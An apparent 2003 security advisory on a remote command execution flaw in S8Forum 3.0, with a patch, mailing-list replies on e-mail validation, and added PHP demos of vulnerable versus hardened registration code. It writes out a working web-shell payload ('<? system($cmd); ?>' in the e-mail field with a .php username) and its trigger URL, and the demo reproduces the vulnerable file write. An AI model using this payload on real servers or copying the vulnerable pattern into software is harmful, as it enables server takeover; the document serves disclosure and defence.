A security vulnerability in S8Forum



nmsh_sa@canada.com
07/01/03, 02:42
INFORMATION :
=============

- Product : S8Forum
- Tested version : 3.0, maybe other versions.
- Website : http://www.kellishaver.com/
- Vendor Status : not informed yet !!!
- Problem : A security vulnerability in S8Forum

PROBLEM :
=========

This forum is written in PHP. It doesn't use a database;
instead it creates a new file with the name of the
registered user and saves it in the (users) directory
without an extension.

The program doesn't check the user's entries, like the user
name, email, etc.! This bug allows us to run some
commands on the server!

EXPLOIT :
=========

- Go to Register.

- In Username, enter:
any_name.php
NOTE: .php :)

- In Password: any_password.

- in E-Mail:

<? system($cmd); ?>

or any code :(

- now go to this URL:

http://sitename/s8forumfolder/users/any_name.php?cmd=uname%20-a

------ out ---

evil.php:c4ca4238a0b923820dcc509a6f75849b Linux
xxx.xxx.net 2.4.18 #2 SMP Mon Nov 18 16:50:02 CST 2002
i686 unknown

------ out ---



SOLUTION :
==========

Open register.php.

- Step 1: find these lines:


case 'registration_confirm':
// what to do with the form data

include("settings/header.php");


- Step 2: add the following below them (the break leaves the switch case
before the user file is written, so it belongs inside each check rather
than after both):


// reject a malformed e-mail address (an empty address is still allowed)
if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$", $email) && $email != "") {
    echo "<p><font size=\"4\" color=\"#FF0000\">Please enter a valid email address. Press the back button and correct it.</font></p>";
    break;
}
// reject a username containing a dot, so no file extension can be smuggled in
if(strstr($uname, ".")) {
    echo "<p><font size=\"4\" color=\"#FF0000\">Please enter a valid username. Press the back button and correct it.</font></p>";
    break;
}



NOTE :
======
The S8Forum author was notified on Sun 17/11/2002.
Another mail was sent on 22/12/2002. No answer so far,
no new release, no patch to fix these issues.



PROVIDED BY :
=============
Nasser.M.Sh
nmsh_sa@yahoo.com

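The registration write described in the advisory, shown as an added example beside a hardened version. This is not S8Forum's code: the record layout, the function names, the `users/` and `private/` directories and the username pattern are assumptions for illustration, and the script uses a throwaway temp directory so it runs offline (PHP 7 or later for the type declarations).

```php
<?php
// Added example, not S8Forum's code. Directory layout, record format and
// function names are assumptions made for illustration.

// Vulnerable pattern: the user-supplied name becomes the file name and the
// user-supplied e-mail is written verbatim into a web-served directory, so a
// username ending in ".php" plus PHP code in the e-mail field yields a script
// the web server will execute.
function save_user_vulnerable(string $usersDir, string $uname, string $password, string $email): string
{
    $path = $usersDir . '/' . $uname;                 // "any_name.php" lands in the web root
    file_put_contents($path, $uname . ':' . md5($password) . "\n" . $email . "\n");
    return $path;
}

// Hardened version:
//  1. whitelist the username so it can never carry a dot, slash or extension;
//  2. store records outside the document root, under a name the code controls;
//  3. validate the e-mail with filter_var (which accepts user+tag@example.com,
//     unlike the advisory's regex) and refuse to overwrite an existing record.
// Even a syntactically valid e-mail must never land where the server can execute it.
function save_user_hardened(string $privateDir, string $uname, string $password, string $email): string
{
    if (!preg_match('/^[A-Za-z0-9_]{3,20}$/', $uname)) {
        throw new InvalidArgumentException('invalid username');
    }
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException('invalid e-mail address');
    }
    $path = $privateDir . '/' . $uname . '.dat';       // fixed extension, outside the web root
    if (file_exists($path)) {
        throw new RuntimeException('username already taken');
    }
    $record = $uname . ':' . password_hash($password, PASSWORD_DEFAULT) . "\n" . $email . "\n";
    // 'x' is O_CREAT|O_EXCL: two racing registrations cannot share one file
    $fh = fopen($path, 'x');
    if ($fh === false) {
        throw new RuntimeException('could not create record');
    }
    fwrite($fh, $record);
    fclose($fh);
    return $path;
}

// Demo with the advisory's payload, in a throwaway directory so it runs offline.
$base = sys_get_temp_dir() . '/s8demo_' . getmypid();
mkdir($base . '/users', 0700, true);     // stand-in for the web-served users/ directory
mkdir($base . '/private', 0700, true);   // stand-in for a directory outside the web root

$uname = 'any_name.php';
$email = '<? system($cmd); ?>';

$p = save_user_vulnerable($base . '/users', $uname, 'any_password', $email);
echo "vulnerable: wrote " . basename($p) . " containing PHP code\n";

try {
    save_user_hardened($base . '/private', $uname, 'any_password', $email);
} catch (InvalidArgumentException $e) {
    echo "hardened: rejected '{$uname}' (" . $e->getMessage() . ")\n";
}
$p = save_user_hardened($base . '/private', 'alice', 'correct horse', 'alice+s8@example.com');
echo "hardened: wrote " . basename($p) . " outside the web root\n";
```

The username whitelist is the control that actually closes the hole; the move outside the document root is defence in depth, so that a future bug in the whitelist still does not hand the attacker an executable file.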

David Wilson
15/01/03, 22:33
On Tue, 2003-01-07 at 03:20, Steve Watt wrote:
> In article <20030105032650.16087.h011.c009.wm@mail.canada.com.criticalpath.net> you write:
> [ snip ]
> >SOLUTION :
> >==========
> [ snip ]
> > if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$", $email) && $email != "") {
>
> Please note that there are many more characters valid in the LHS of an
> email address, for example +, that are often desirable. Disallowing
> such addresses is a major nuisance.

Indeed.

In fact, ANY ASCII character can appear in the local-part of the
address, because the local part can be a quoted-string and a
quoted-string can contain virtually any ASCII.

Then, the domain can be a domain-literal, and this can contain CFWS,
which can contain comments. Comments cannot be recognised by a regular
expression as comments nest.

RFC 2822 address validation requires knowledge of that standard.

David Wilson
Isode Limited

Steve Watt
21/01/03, 05:48
In article <20030105032650.16087.h011.c009.wm@mail.canada.com.criticalpath.net> you write:
[ snip ]
>SOLUTION :
>==========
[ snip ]
> if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$", $email) && $email != "") {

Please note that there are many more characters valid in the LHS of an
email address, for example +, that are often desirable. Disallowing
such addresses is a major nuisance. A beautiful example is the useful
feature in sendmail that allows user+whatever@dom.ain, which allows
users to invent infinite variations on their email address for tracking
spam database propagation.

In this particular application, the error is more widespread than the
fix you cite -- if you're going to allow random users to control file
names on your system, you certainly shouldn't put the contents somewhere
that a web server can directly find it.

That bit of software seems to need a major review.

--
Steve Watt KD6GGD PP-ASEL-IA ICBM: 121W 56' 57.8" / 37N 20' 14.9"
Internet: steve @ Watt.COM Whois: SW32
Free time? There's no such thing. It just comes in varying prices...
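To make the two replies' objection concrete, here is an added example (not code from the thread) that runs the advisory's eregi() pattern, converted to a PCRE with the same case-insensitive flag, and PHP's filter_var(FILTER_VALIDATE_EMAIL) over a constructed list of addresses. The address list and the function names are assumptions for illustration; filter_var is itself only RFC 822 addr-spec without comments, folding whitespace or dotless domains, so it is not full RFC 2822 either, but it does not throw away plus-addressing.

```php
<?php
// Added example, not from the thread. The sample addresses are constructed.

// The advisory's eregi() pattern, as a PCRE with the same case-insensitive flag.
const ADVISORY_EMAIL_RE = '/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$/i';

function advisory_regex_accepts(string $email): bool
{
    return preg_match(ADVISORY_EMAIL_RE, $email) === 1;
}

// PHP's built-in validator: RFC 822 addr-spec minus comments, folding
// whitespace and dotless domains. Not full RFC 2822, but it keeps '+'.
function filter_var_accepts(string $email): bool
{
    return filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

$samples = [
    'user@example.com',               // plain address: both accept
    'user+spamtrap@example.com',      // sendmail-style tag: the regex rejects '+'
    'first.last@example.museum',      // TLD longer than 3 letters: the regex rejects
    'user@localhost',                 // dotless domain: both reject
    '"john doe"@example.com',         // quoted local part (RFC 2822): the regex rejects
    'user(note(nested))@example.com', // nested comment: no regex can model this
    'any_name.php',                   // the advisory's username, not an address at all
];

printf("%-34s %-16s %s\n", 'address', 'advisory regex', 'filter_var');
foreach ($samples as $s) {
    printf("%-34s %-16s %s\n", $s,
        advisory_regex_accepts($s) ? 'accept' : 'reject',
        filter_var_accepts($s) ? 'accept' : 'reject');
}
```

The table this prints shows the cost of the advisory's fix in its own terms: every address with a '+' tag or a long TLD is turned away, while, as Steve Watt notes, the e-mail field was never the real problem; the file name and the file's location were.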